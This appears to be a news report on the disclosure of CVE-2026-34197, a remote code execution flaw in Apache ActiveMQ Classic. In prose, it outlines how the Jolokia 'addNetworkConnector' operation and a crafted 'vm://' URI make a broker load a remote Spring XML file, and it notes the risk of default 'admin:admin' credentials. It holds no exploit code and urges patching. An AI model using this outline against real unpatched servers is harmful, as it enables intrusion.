Cybersecurity firm Horizon3.ai has disclosed a remote code execution (RCE) vulnerability, tracked as CVE-2026-34197, affecting the open-source message broker Apache ActiveMQ Classic. The vulnerability has remained hidden within the software for 13 years, potentially impacting a wide range of organizations across the financial, healthcare, and government sectors.
At the heart of the issue is ActiveMQ’s built-in Jolokia API. Designed as a bridge between HTTP and JMX, Jolokia is intended to provide remote management capabilities. Researcher Naveen Sunkavally explained that attackers can exploit this by invoking the 'addNetworkConnector' operation within the Jolokia API, forcing the broker to fetch and execute an external Spring XML configuration file, which leads to remote code execution.
Root Cause and Exploitation
ActiveMQ’s configuration allows for inter-broker connections via URIs. The vulnerability is triggered through the 'vm://' transport protocol, which was originally intended for embedding brokers within a single JVM. By crafting a specific URI and passing it as a parameter, an attacker can force ActiveMQ to instantiate a non-existent broker and load a configuration file from a remote URL of the attacker's choosing.
Horizon3.ai’s analysis indicates that while earlier security patches restricted Jolokia’s access to dangerous MBeans, the overly permissive default access controls on ActiveMQ’s own MBeans allow attackers to bypass these protections. In certain versions (6.0.0 through 6.1.1), the lack of authentication—stemming from the previously identified CVE-2024-32114—means that attackers can execute the exploit without needing any login credentials at all.
The barrier to entry for this exploit is low. If a system is running with default configurations, an attacker can take control of the server with a simple HTTP POST request. Even in environments where credentials are required, if administrators have failed to change the default 'admin:admin' credentials, attackers can easily gain unauthorized access.
As a critical component in distributed systems, Apache ActiveMQ has frequently been a target for malicious actors. Previous vulnerabilities, such as CVE-2016-3088 and CVE-2023-46604, have been included in the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) catalog.
The Apache Software Foundation has released patches to address the issue. Organizations are strongly advised to upgrade their ActiveMQ instances to version 6.2.3 or 5.19.4 as soon as possible. Given the severity of the flaw and the active nature of current exploitation methods, Horizon3.ai emphasizes that enterprises should treat this update as a top security priority.